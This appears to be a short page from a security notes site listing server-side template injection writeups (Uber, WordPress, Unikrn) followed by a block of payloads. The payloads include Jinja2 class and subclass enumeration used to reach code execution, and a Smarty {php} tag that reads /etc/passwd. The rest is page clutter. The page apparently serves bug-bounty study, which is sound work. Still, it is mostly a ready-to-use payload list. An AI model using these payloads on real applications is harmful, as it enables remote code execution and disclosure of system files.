Server-Side Template Injection Writeups
Uber - Template Injection Python RCE

WordPress - XSS


Unikrn - Smarty Template


Last updated
Was this helpful?





Last updated
Was this helpful?
Was this helpful?
//Payloads used
{{ '7'*7 }}
{{ [].class.base.subclasses() }} # get all classes
{{''.class.mro()[1].subclasses()}}
{%for c in [1,2,3] %}{{c,c,c}}{% endfor %}{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}